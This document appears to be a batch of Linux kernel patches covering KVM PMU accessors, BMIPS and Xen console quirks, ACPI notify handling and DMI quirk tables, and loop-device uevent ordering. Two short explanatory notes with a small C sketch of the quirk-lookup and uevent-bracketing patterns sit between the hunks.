+@@ -981,7 +997,7 @@ static bool access_pmuserenr(struct kvm_vcpu *vcpu, struct sys_reg_params *p,
+ /* Macro to expand the PMEVCNTRn_EL0 register */
+ #define PMU_PMEVCNTR_EL0(n)						\
+ 	{ PMU_SYS_REG(SYS_PMEVCNTRn_EL0(n)),				\
+-	  .reset = reset_pmevcntr,					\
++	  .reset = reset_pmevcntr, .get_user = get_pmu_evcntr,		\
+ 	  .access = access_pmu_evcntr, .reg = (PMEVCNTR0_EL0 + n), }
+ 
+ /* Macro to expand the PMEVTYPERn_EL0 register */
+@@ -1745,7 +1761,8 @@ static const struct sys_reg_desc sys_reg_descs[] = {
+ 	{ PMU_SYS_REG(SYS_PMCEID1_EL0),
+ 	  .access = access_pmceid, .reset = NULL },
+ 	{ PMU_SYS_REG(SYS_PMCCNTR_EL0),
+-	  .access = access_pmu_evcntr, .reset = reset_unknown, .reg = PMCCNTR_EL0 },
++	  .access = access_pmu_evcntr, .reset = reset_unknown,
++	  .reg = PMCCNTR_EL0, .get_user = get_pmu_evcntr},
+ 	{ PMU_SYS_REG(SYS_PMXEVTYPER_EL0),
+ 	  .access = access_pmu_evtyper, .reset = NULL },
+ 	{ PMU_SYS_REG(SYS_PMXEVCNTR_EL0),
+diff --git a/arch/mips/bmips/dma.c b/arch/mips/bmips/dma.c
+index 33788668cbdbf..3779e7855bd75 100644
+--- a/arch/mips/bmips/dma.c
++++ b/arch/mips/bmips/dma.c
+@@ -5,6 +5,8 @@
+ #include <asm/bmips.h>
+ #include <asm/io.h>
+ 
++bool bmips_rac_flush_disable;
++
+ void arch_sync_dma_for_cpu_all(void)
+ {
+ 	void __iomem *cbr = BMIPS_GET_CBR();
+@@ -15,6 +17,9 @@ void arch_sync_dma_for_cpu_all(void)
+ 	    boot_cpu_type() != CPU_BMIPS4380)
+ 		return;
+ 
++	if (unlikely(bmips_rac_flush_disable))
++		return;
++
+ 	/* Flush stale data out of the readahead cache */
+ 	cfg = __raw_readl(cbr + BMIPS_RAC_CONFIG);
+ 	__raw_writel(cfg | 0x100, cbr + BMIPS_RAC_CONFIG);
+diff --git a/arch/mips/bmips/setup.c b/arch/mips/bmips/setup.c
+index e95b3f78e7cd4..549a6392a3d2d 100644
+--- a/arch/mips/bmips/setup.c
++++ b/arch/mips/bmips/setup.c
+@@ -35,6 +35,8 @@
+ #define REG_BCM6328_OTP		((void __iomem *)CKSEG1ADDR(0x1000062c))
+ #define BCM6328_TP1_DISABLED	BIT(9)
+ 
++extern bool bmips_rac_flush_disable;
++
+ static const unsigned long kbase = VMLINUX_LOAD_ADDRESS & 0xfff00000;
+ 
+ struct bmips_quirk {
+@@ -104,6 +106,12 @@ static void bcm6358_quirks(void)
+ 	 * disable SMP for now
+ 	 */
+ 	bmips_smp_enabled = 0;
++
++	/*
++	 * RAC flush causes kernel panics on BCM6358 when booting from TP1
++	 * because the bootloader is not initializing it properly.
++	 */
++	bmips_rac_flush_disable = !!(read_c0_brcm_cmt_local() & (1 << 31));
+ }
+ 
+ static void bcm6368_quirks(void)
+diff --git a/arch/powerpc/include/asm/book3s/64/tlbflush.h b/arch/powerpc/include/asm/book3s/64/tlbflush.h
+index 2bbc0fcce04a3..5e26c7f2c25ab 100644
+--- a/arch/powerpc/include/asm/book3s/64/tlbflush.h
++++ b/arch/powerpc/include/asm/book3s/64/tlbflush.h
+@@ -148,6 +148,11 @@ static inline void flush_tlb_fix_spurious_fault(struct vm_area_struct *vma,
+ 	 */
+ }
+ 
++static inline bool __pte_protnone(unsigned long pte)
++{
++	return (pte & (pgprot_val(PAGE_NONE) | _PAGE_RWX)) == pgprot_val(PAGE_NONE);
++}
++
+ static inline bool __pte_flags_need_flush(unsigned long oldval,
+ 					  unsigned long newval)
+ {
+@@ -164,8 +169,8 @@ static inline bool __pte_flags_need_flush(unsigned long oldval,
+ 	/*
+ 	 * We do not expect kernel mappings or non-PTEs or not-present PTEs.
+ 	 */
+-	VM_WARN_ON_ONCE(oldval & _PAGE_PRIVILEGED);
+-	VM_WARN_ON_ONCE(newval & _PAGE_PRIVILEGED);
++	VM_WARN_ON_ONCE(!__pte_protnone(oldval) && oldval & _PAGE_PRIVILEGED);
++	VM_WARN_ON_ONCE(!__pte_protnone(newval) && newval & _PAGE_PRIVILEGED);
+ 	VM_WARN_ON_ONCE(!(oldval & _PAGE_PTE));
+ 	VM_WARN_ON_ONCE(!(newval & _PAGE_PTE));
+ 	VM_WARN_ON_ONCE(!(oldval & _PAGE_PRESENT));
+diff --git a/arch/powerpc/kernel/ptrace/ptrace-view.c b/arch/powerpc/kernel/ptrace/ptrace-view.c
+index 2087a785f05f1..5fff0d04b23f7 100644
+--- a/arch/powerpc/kernel/ptrace/ptrace-view.c
++++ b/arch/powerpc/kernel/ptrace/ptrace-view.c
+@@ -290,6 +290,9 @@ static int gpr_set(struct task_struct *target, const struct user_regset *regset,
+ static int ppr_get(struct task_struct *target, const struct user_regset *regset,
+ 		   struct membuf to)
+ {
++	if (!target->thread.regs)
++		return -EINVAL;
++
+ 	return membuf_write(&to, &target->thread.regs->ppr, sizeof(u64));
+ }
+ 
+@@ -297,6 +300,9 @@ static int ppr_set(struct task_struct *target, const struct user_regset *regset,
+ 		   unsigned int pos, unsigned int count, const void *kbuf,
+ 		   const void __user *ubuf)
+ {
++	if (!target->thread.regs)
++		return -EINVAL;
++
+ 	return user_regset_copyin(&pos, &count, &kbuf, &ubuf,
+ 				  &target->thread.regs->ppr, 0, sizeof(u64));
+ }
+diff --git a/arch/powerpc/platforms/pseries/vas.c b/arch/powerpc/platforms/pseries/vas.c
+index 4ad6e510d405f..94c023bb13e05 100644
+--- a/arch/powerpc/platforms/pseries/vas.c
++++ b/arch/powerpc/platforms/pseries/vas.c
+@@ -857,6 +857,13 @@ int pseries_vas_dlpar_cpu(void)
+ {
+ 	int new_nr_creds, rc;
+ 
++	/*
++	 * NX-GZIP is not enabled. Nothing to do for DLPAR event
++	 */
++	if (!copypaste_feat)
++		return 0;
++
++
+ 	rc = h_query_vas_capabilities(H_QUERY_VAS_CAPABILITIES,
+ 				      vascaps[VAS_GZIP_DEF_FEAT_TYPE].feat,
+ 				      (u64)virt_to_phys(&hv_cop_caps));
+@@ -1013,6 +1020,7 @@ static int __init pseries_vas_init(void)
+ 	 * Linux supports user space COPY/PASTE only with Radix
+ 	 */
+ 	if (!radix_enabled()) {
++		copypaste_feat = false;
+ 		pr_err("API is supported only with radix page tables\n");
+ 		return -ENOTSUPP;
+ 	}
+diff --git a/arch/riscv/kvm/vcpu_timer.c b/arch/riscv/kvm/vcpu_timer.c
+index ad34519c8a13d..3ac2ff6a65dac 100644
+--- a/arch/riscv/kvm/vcpu_timer.c
++++ b/arch/riscv/kvm/vcpu_timer.c
+@@ -147,10 +147,8 @@ static void kvm_riscv_vcpu_timer_blocking(struct kvm_vcpu *vcpu)
+ 		return;
+ 
+ 	delta_ns = kvm_riscv_delta_cycles2ns(t->next_cycles, gt, t);
+-	if (delta_ns) {
+-		hrtimer_start(&t->hrt, ktime_set(0, delta_ns), HRTIMER_MODE_REL);
+-		t->next_set = true;
+-	}
++	hrtimer_start(&t->hrt, ktime_set(0, delta_ns), HRTIMER_MODE_REL);
++	t->next_set = true;
+ }
+ 
+ static void kvm_riscv_vcpu_timer_unblocking(struct kvm_vcpu *vcpu)
+diff --git a/arch/s390/Makefile b/arch/s390/Makefile
+index b3235ab0ace83..ed646c583e4fe 100644
+--- a/arch/s390/Makefile
++++ b/arch/s390/Makefile
+@@ -162,7 +162,7 @@ vdso_prepare: prepare0
+ 
+ ifdef CONFIG_EXPOLINE_EXTERN
+ modules_prepare: expoline_prepare
+-expoline_prepare:
++expoline_prepare: scripts
+ 	$(Q)$(MAKE) $(build)=arch/s390/lib/expoline arch/s390/lib/expoline/expoline.o
+ endif
+ endif
+diff --git a/arch/s390/lib/uaccess.c b/arch/s390/lib/uaccess.c
+index 720036fb19242..d44214072779e 100644
+--- a/arch/s390/lib/uaccess.c
++++ b/arch/s390/lib/uaccess.c
+@@ -172,7 +172,7 @@ unsigned long __clear_user(void __user *to, unsigned long size)
+ 		"4: slgr  %0,%0\n"
+ 		"5:\n"
+ 		EX_TABLE(0b,2b) EX_TABLE(6b,2b) EX_TABLE(3b,5b) EX_TABLE(7b,5b)
+-		: "+a" (size), "+a" (to), "+a" (tmp1), "=a" (tmp2)
++		: "+&a" (size), "+&a" (to), "+a" (tmp1), "=&a" (tmp2)
+ 		: "a" (empty_zero_page), [spec] "d" (spec.val)
+ 		: "cc", "memory", "0");
+ 	return size;
+diff --git a/arch/x86/xen/Makefile b/arch/x86/xen/Makefile
+index 3c5b52fbe4a7f..a9ec8c9f5c5dd 100644
+--- a/arch/x86/xen/Makefile
++++ b/arch/x86/xen/Makefile
+@@ -45,6 +45,6 @@ obj-$(CONFIG_PARAVIRT_SPINLOCKS)+= spinlock.o
+ 
+ obj-$(CONFIG_XEN_DEBUG_FS)	+= debugfs.o
+ 
+-obj-$(CONFIG_XEN_PV_DOM0)	+= vga.o
++obj-$(CONFIG_XEN_DOM0)		+= vga.o
+ 
+ obj-$(CONFIG_XEN_EFI)		+= efi.o
+diff --git a/arch/x86/xen/enlighten_pv.c b/arch/x86/xen/enlighten_pv.c
+index 5b13796628770..68f5f5d209dfa 100644
+--- a/arch/x86/xen/enlighten_pv.c
++++ b/arch/x86/xen/enlighten_pv.c
+@@ -1389,7 +1389,8 @@ asmlinkage __visible void __init xen_start_kernel(struct start_info *si)
+ 
+ 		x86_platform.set_legacy_features =
+ 				xen_dom0_set_legacy_features;
+-		xen_init_vga(info, xen_start_info->console.dom0.info_size);
++		xen_init_vga(info, xen_start_info->console.dom0.info_size,
++			     &boot_params.screen_info);
+ 		xen_start_info->console.domU.mfn = 0;
+ 		xen_start_info->console.domU.evtchn = 0;
+ 
+diff --git a/arch/x86/xen/enlighten_pvh.c b/arch/x86/xen/enlighten_pvh.c
+index bcae606bbc5cf..ada3868c02c23 100644
+--- a/arch/x86/xen/enlighten_pvh.c
++++ b/arch/x86/xen/enlighten_pvh.c
+@@ -43,6 +43,19 @@ void __init xen_pvh_init(struct boot_params *boot_params)
+ 	x86_init.oem.banner = xen_banner;
+ 
+ 	xen_efi_init(boot_params);
++
++	if (xen_initial_domain()) {
++		struct xen_platform_op op = {
++			.cmd = XENPF_get_dom0_console,
++		};
++		int ret = HYPERVISOR_platform_op(&op);
++
++		if (ret > 0)
++			xen_init_vga(&op.u.dom0_console,
++				     min(ret * sizeof(char),
++					 sizeof(op.u.dom0_console)),
++				     &boot_params->screen_info);
++	}
+ }
+ 
+ void __init mem_map_via_hcall(struct boot_params *boot_params_p)
+diff --git a/arch/x86/xen/vga.c b/arch/x86/xen/vga.c
+index 14ea32e734d59..d97adab8420f4 100644
+--- a/arch/x86/xen/vga.c
++++ b/arch/x86/xen/vga.c
+@@ -9,10 +9,9 @@
+ 
+ #include "xen-ops.h"
+ 
+-void __init xen_init_vga(const struct dom0_vga_console_info *info, size_t size)
++void __init xen_init_vga(const struct dom0_vga_console_info *info, size_t size,
++			 struct screen_info *screen_info)
+ {
+-	struct screen_info *screen_info = &boot_params.screen_info;
+-
+ 	/* This is drawn from a dump from vgacon:startup in
+ 	 * standard Linux. */
+ 	screen_info->orig_video_mode = 3;
+diff --git a/arch/x86/xen/xen-ops.h b/arch/x86/xen/xen-ops.h
+index 9a8bb972193d8..a10903785a338 100644
+--- a/arch/x86/xen/xen-ops.h
++++ b/arch/x86/xen/xen-ops.h
+@@ -108,11 +108,12 @@ static inline void xen_uninit_lock_cpu(int cpu)
+ 
+ struct dom0_vga_console_info;
+ 
+-#ifdef CONFIG_XEN_PV_DOM0
+-void __init xen_init_vga(const struct dom0_vga_console_info *, size_t size);
++#ifdef CONFIG_XEN_DOM0
++void __init xen_init_vga(const struct dom0_vga_console_info *, size_t size,
++			 struct screen_info *);
+ #else
+ static inline void __init xen_init_vga(const struct dom0_vga_console_info *info,
+-				       size_t size)
++				       size_t size, struct screen_info *si)
+ {
+ }
+ #endif
+diff --git a/arch/xtensa/kernel/traps.c b/arch/xtensa/kernel/traps.c
+index cd98366a9b238..f0a7d1c2641e0 100644
+--- a/arch/xtensa/kernel/traps.c
++++ b/arch/xtensa/kernel/traps.c
+@@ -539,7 +539,7 @@ static size_t kstack_depth_to_print = CONFIG_PRINT_STACK_DEPTH;
+ 
+ void show_stack(struct task_struct *task, unsigned long *sp, const char *loglvl)
+ {
+-	size_t len;
++	size_t len, off = 0;
+ 
+ 	if (!sp)
+ 		sp = stack_pointer(task);
+@@ -548,9 +548,17 @@ void show_stack(struct task_struct *task, unsigned long *sp, const char *loglvl)
+ 		  kstack_depth_to_print * STACK_DUMP_ENTRY_SIZE);
+ 
+ 	printk("%sStack:\n", loglvl);
+-	print_hex_dump(loglvl, " ", DUMP_PREFIX_NONE,
+-		       STACK_DUMP_LINE_SIZE, STACK_DUMP_ENTRY_SIZE,
+-		       sp, len, false);
++	while (off < len) {
++		u8 line[STACK_DUMP_LINE_SIZE];
++		size_t line_len = len - off > STACK_DUMP_LINE_SIZE ?
++			STACK_DUMP_LINE_SIZE : len - off;
++
++		__memcpy(line, (u8 *)sp + off, line_len);
++		print_hex_dump(loglvl, " ", DUMP_PREFIX_NONE,
++			       STACK_DUMP_LINE_SIZE, STACK_DUMP_ENTRY_SIZE,
++			       line, line_len, false);
++		off += STACK_DUMP_LINE_SIZE;
++	}
+ 	show_trace(task, sp, loglvl);
+ }
+ 
+diff --git a/drivers/acpi/bus.c b/drivers/acpi/bus.c
+index 0c05ccde1f7a6..7c16bc15e7a14 100644
+--- a/drivers/acpi/bus.c
++++ b/drivers/acpi/bus.c
+@@ -459,85 +459,67 @@ out_free:
+                              Notification Handling
+    -------------------------------------------------------------------------- */
+ 
+-/*
+- * acpi_bus_notify
+- * ---------------
+- * Callback for all 'system-level' device notifications (values 0x00-0x7F).
++/**
++ * acpi_bus_notify - Global system-level (0x00-0x7F) notifications handler
++ * @handle: Target ACPI object.
++ * @type: Notification type.
++ * @data: Ignored.
++ *
++ * This only handles notifications related to device hotplug.
+  */
+ static void acpi_bus_notify(acpi_handle handle, u32 type, void *data)
+ {
+ 	struct acpi_device *adev;
+-	u32 ost_code = ACPI_OST_SC_NON_SPECIFIC_FAILURE;
+-	bool hotplug_event = false;
+ 
+ 	switch (type) {
+ 	case ACPI_NOTIFY_BUS_CHECK:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_BUS_CHECK event\n");
+-		hotplug_event = true;
+ 		break;
+ 
+ 	case ACPI_NOTIFY_DEVICE_CHECK:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_DEVICE_CHECK event\n");
+-		hotplug_event = true;
+ 		break;
+ 
+ 	case ACPI_NOTIFY_DEVICE_WAKE:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_DEVICE_WAKE event\n");
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_EJECT_REQUEST:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_EJECT_REQUEST event\n");
+-		hotplug_event = true;
+ 		break;
+ 
+ 	case ACPI_NOTIFY_DEVICE_CHECK_LIGHT:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_DEVICE_CHECK_LIGHT event\n");
+ 		/* TBD: Exactly what does 'light' mean? */
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_FREQUENCY_MISMATCH:
+ 		acpi_handle_err(handle, "Device cannot be configured due "
+ 				"to a frequency mismatch\n");
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_BUS_MODE_MISMATCH:
+ 		acpi_handle_err(handle, "Device cannot be configured due "
+ 				"to a bus mode mismatch\n");
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_POWER_FAULT:
+ 		acpi_handle_err(handle, "Device has suffered a power fault\n");
+-		break;
++		return;
+ 
+ 	default:
+ 		acpi_handle_debug(handle, "Unknown event type 0x%x\n", type);
+-		break;
++		return;
+ 	}
+ 
+ 	adev = acpi_get_acpi_dev(handle);
+-	if (!adev)
+-		goto err;
+-
+-	if (adev->dev.driver) {
+-		struct acpi_driver *driver = to_acpi_driver(adev->dev.driver);
+-
+-		if (driver && driver->ops.notify &&
+-		    (driver->flags & ACPI_DRIVER_ALL_NOTIFY_EVENTS))
+-			driver->ops.notify(adev, type);
+-	}
+-
+-	if (!hotplug_event) {
+-		acpi_put_acpi_dev(adev);
+-		return;
+-	}
+ 
+-	if (ACPI_SUCCESS(acpi_hotplug_schedule(adev, type)))
++	if (adev && ACPI_SUCCESS(acpi_hotplug_schedule(adev, type)))
+ 		return;
+ 
+ 	acpi_put_acpi_dev(adev);
+ 
+- err:
+-	acpi_evaluate_ost(handle, type, ost_code, NULL);
++	acpi_evaluate_ost(handle, type, ACPI_OST_SC_NON_SPECIFIC_FAILURE, NULL);
+ }
+ 
+ static void acpi_notify_device(acpi_handle handle, u32 event, void *data)
+@@ -562,42 +544,51 @@ static u32 acpi_device_fixed_event(void *data)
+ 	return ACPI_INTERRUPT_HANDLED;
+ }
+ 
+-static int acpi_device_install_notify_handler(struct acpi_device *device)
++static int acpi_device_install_notify_handler(struct acpi_device *device,
++					      struct acpi_driver *acpi_drv)
+ {
+ 	acpi_status status;
+ 
+-	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON)
++	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON) {
+ 		status =
+ 		    acpi_install_fixed_event_handler(ACPI_EVENT_POWER_BUTTON,
+ 						     acpi_device_fixed_event,
+ 						     device);
+-	else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON)
++	} else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON) {
+ 		status =
+ 		    acpi_install_fixed_event_handler(ACPI_EVENT_SLEEP_BUTTON,
+ 						     acpi_device_fixed_event,
+ 						     device);
+-	else
+-		status = acpi_install_notify_handler(device->handle,
+-						     ACPI_DEVICE_NOTIFY,
++	} else {
++		u32 type = acpi_drv->flags & ACPI_DRIVER_ALL_NOTIFY_EVENTS ?
++				ACPI_ALL_NOTIFY : ACPI_DEVICE_NOTIFY;
++
++		status = acpi_install_notify_handler(device->handle, type,
+ 						     acpi_notify_device,
+ 						     device);
++	}
+ 
+ 	if (ACPI_FAILURE(status))
+ 		return -EINVAL;
+ 	return 0;
+ }
+ 
+-static void acpi_device_remove_notify_handler(struct acpi_device *device)
++static void acpi_device_remove_notify_handler(struct acpi_device *device,
++					      struct acpi_driver *acpi_drv)
+ {
+-	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON)
++	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON) {
+ 		acpi_remove_fixed_event_handler(ACPI_EVENT_POWER_BUTTON,
+ 						acpi_device_fixed_event);
+-	else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON)
++	} else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON) {
+ 		acpi_remove_fixed_event_handler(ACPI_EVENT_SLEEP_BUTTON,
+ 						acpi_device_fixed_event);
+-	else
+-		acpi_remove_notify_handler(device->handle, ACPI_DEVICE_NOTIFY,
++	} else {
++		u32 type = acpi_drv->flags & ACPI_DRIVER_ALL_NOTIFY_EVENTS ?
++				ACPI_ALL_NOTIFY : ACPI_DEVICE_NOTIFY;
++
++		acpi_remove_notify_handler(device->handle, type,
+ 					   acpi_notify_device);
++	}
+ }
+ 
+ /* Handle events targeting \_SB device (at present only graceful shutdown) */
+@@ -1039,7 +1030,7 @@ static int acpi_device_probe(struct device *dev)
+ 		 acpi_drv->name, acpi_dev->pnp.bus_id);
+ 
+ 	if (acpi_drv->ops.notify) {
+-		ret = acpi_device_install_notify_handler(acpi_dev);
++		ret = acpi_device_install_notify_handler(acpi_dev, acpi_drv);
+ 		if (ret) {
+ 			if (acpi_drv->ops.remove)
+ 				acpi_drv->ops.remove(acpi_dev);
+@@ -1062,7 +1053,7 @@ static void acpi_device_remove(struct device *dev)
+ 	struct acpi_driver *acpi_drv = to_acpi_driver(dev->driver);
+ 
+ 	if (acpi_drv->ops.notify)
+-		acpi_device_remove_notify_handler(acpi_dev);
++		acpi_device_remove_notify_handler(acpi_dev, acpi_drv);
+ 
+ 	if (acpi_drv->ops.remove)
+ 		acpi_drv->ops.remove(acpi_dev);
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 710ac640267dd..14d6d81e536fe 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -716,6 +716,13 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Dell G15 5515"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Vostro 15 3535"),
++		},
++	},
+ 
+ 	/*
+ 	 * Desktops which falsely report a backlight and which our heuristics
+diff --git a/drivers/acpi/x86/utils.c b/drivers/acpi/x86/utils.c
+index e45285d4e62a4..da5727069d851 100644
+--- a/drivers/acpi/x86/utils.c
++++ b/drivers/acpi/x86/utils.c
+@@ -251,6 +251,7 @@ bool force_storage_d3(void)
+ #define ACPI_QUIRK_UART1_TTY_UART2_SKIP				BIT(1)
+ #define ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY			BIT(2)
+ #define ACPI_QUIRK_USE_ACPI_AC_AND_BATTERY			BIT(3)
++#define ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS			BIT(4)
+ 
+ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 	/*
+@@ -279,6 +280,16 @@ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 	 *    need the x86-android-tablets module to properly work.
+ 	 */
+ #if IS_ENABLED(CONFIG_X86_ANDROID_TABLETS)
++	{
++		/* Acer Iconia One 7 B1-750 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "VESPA2"),
++		},
++		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY |
++					ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS),
++	},
+ 	{
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+@@ -286,7 +297,19 @@ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 		},
+ 		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
+ 					ACPI_QUIRK_UART1_TTY_UART2_SKIP |
+-					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY |
++					ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS),
++	},
++	{
++		/* Lenovo Yoga Book X90F/L */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		},
++		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY |
++					ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS),
+ 	},
+ 	{
+ 		.matches = {
+@@ -294,7 +317,8 @@ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "TF103C"),
+ 		},
+ 		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
+-					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY |
++					ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS),
+ 	},
+ 	{
+ 		/* Lenovo Yoga Tablet 2 1050F/L */
+@@ -336,7 +360,8 @@ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "M890BAP"),
+ 		},
+ 		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
+-					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY |
++					ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS),
+ 	},
+ 	{
+ 		/* Whitelabel (sold as various brands) TM800A550L */
+@@ -413,6 +438,20 @@ int acpi_quirk_skip_serdev_enumeration(struct device *controller_parent, bool *s
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(acpi_quirk_skip_serdev_enumeration);
++
++bool acpi_quirk_skip_gpio_event_handlers(void)
++{
++	const struct dmi_system_id *dmi_id;
++	long quirks;
++
++	dmi_id = dmi_first_match(acpi_quirk_skip_dmi_ids);
++	if (!dmi_id)
++		return false;
++
++	quirks = (unsigned long)dmi_id->driver_data;
++	return (quirks & ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS);
++}
++EXPORT_SYMBOL_GPL(acpi_quirk_skip_gpio_event_handlers);
+ #endif
+ 
+ /* Lists of PMIC ACPI HIDs with an (often better) native charger driver */
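+
acpi_quirk_skip_gpio_event_handlers() follows the usual DMI-quirk shape: match the machine once, then test a flag bit packed into driver_data. A standalone sketch of that lookup with a made-up table (this models the pattern, not the kernel's dmi_first_match() API):

#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define QUIRK_SKIP_GPIO_EVENTS (1UL << 4)	/* mirrors BIT(4) above */

struct quirk { const char *product; unsigned long flags; };

static const struct quirk quirks[] = {
	{ "VESPA2", QUIRK_SKIP_GPIO_EVENTS },
	{ "TF103C", QUIRK_SKIP_GPIO_EVENTS },
};

static bool skip_gpio_events(const char *product)
{
	for (size_t i = 0; i < sizeof(quirks) / sizeof(quirks[0]); i++)
		if (!strcmp(quirks[i].product, product))
			return quirks[i].flags & QUIRK_SKIP_GPIO_EVENTS;
	return false;	/* no entry: keep default behaviour */
}

int main(void)
{
	printf("VESPA2: %d\n", skip_gpio_events("VESPA2"));
	printf("OTHER:  %d\n", skip_gpio_events("OTHER"));
	return 0;
}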
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index eabbc3bdec221..4916fe78ab8fa 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -1010,9 +1010,6 @@ static int loop_configure(struct loop_device *lo, fmode_t mode,
+ 	/* This is safe, since we have a reference from open(). */
+ 	__module_get(THIS_MODULE);
+ 
+-	/* suppress uevents while reconfiguring the device */
+-	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 1);
+-
+ 	/*
+ 	 * If we don't hold exclusive handle for the device, upgrade to it
+ 	 * here to avoid changing device under exclusive owner.
+@@ -1067,6 +1064,9 @@ static int loop_configure(struct loop_device *lo, fmode_t mode,
+ 		}
+ 	}
+ 
++	/* suppress uevents while reconfiguring the device */
++	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 1);
++
+ 	disk_force_media_change(lo->lo_disk, DISK_EVENT_MEDIA_CHANGE);
+ 	set_disk_ro(lo->lo_disk, (lo->lo_flags & LO_FLAGS_READ_ONLY) != 0);
+ 
+@@ -1109,17 +1109,17 @@ static int loop_configure(struct loop_device *lo, fmode_t mode,
+ 	if (partscan)
+ 		clear_bit(GD_SUPPRESS_PART_SCAN, &lo->lo_disk->state);
+ 
++	/* enable and uncork uevent now that we are done */
++	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 0);
++
+ 	loop_global_unlock(lo, is_loop);
+ 	if (partscan)
+ 		loop_reread_partitions(lo);
++
+ 	if (!(mode & FMODE_EXCL))
+ 		bd_abort_claiming(bdev, loop_configure);
+ 
+-	error = 0;
+-done:
+-	/* enable and uncork uevent now that we are done */
+-	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 0);
+-	return error;
++	return 0;
+ 
+ out_unlock:
+ 	loop_global_unlock(lo, is_loop);
+@@ -1130,7 +1130,7 @@ out_putf:
+ 	fput(file);
+ 	/* This is safe: open() is still holding a reference. */
+ 	module_put(THIS_MODULE);
+-	goto done;
++	return error;
+ }
+ 
+ static void __loop_clr_fd(struct loop_device *lo, bool release)
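+
The loop fix is an ordering one: uevent suppression now starts only after the file and claiming setup can no longer fail, so the early-error paths (out_unlock/out_putf) never have to remember to unsuppress, and the success path uncorks before unlocking. A minimal sketch of the bracket-late pattern (not kernel code):

#include <stdio.h>

static void set_suppress(int on)	/* stands in for dev_set_uevent_suppress() */
{
	printf("suppress=%d\n", on);
}

static int configure(int fail)
{
	if (fail)
		return -1;	/* before the bracket: nothing to undo */

	set_suppress(1);	/* bracket opens once failures are behind us */
	/* ... reconfigure the device, emit the media-change event ... */
	set_suppress(0);	/* bracket closes on the success path */
	return 0;
}

int main(void)
{
	configure(1);
	configure(0);
	return 0;
}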
+diff --git a/drivers/gpio/gpiolib-acpi.c b/drivers/gpio/gpiolib-acpi.c
+index 34ff048e70d0e..7c9175619a1dc 100644
+--- a/drivers/gpio/gpiolib-acpi.c
++++ b/drivers/gpio/gpiolib-acpi.c
+@@ -536,6 +536,9 @@ void acpi_gpiochip_request_interrupts(struct gpio_chip *chip)
+ 	if (ACPI_FAILURE(status))
+ 		return;
+ 
++	if (acpi_quirk_skip_gpio_event_handlers())
++		return;
++
+ 	acpi_walk_resources(handle, METHOD_NAME__AEI,
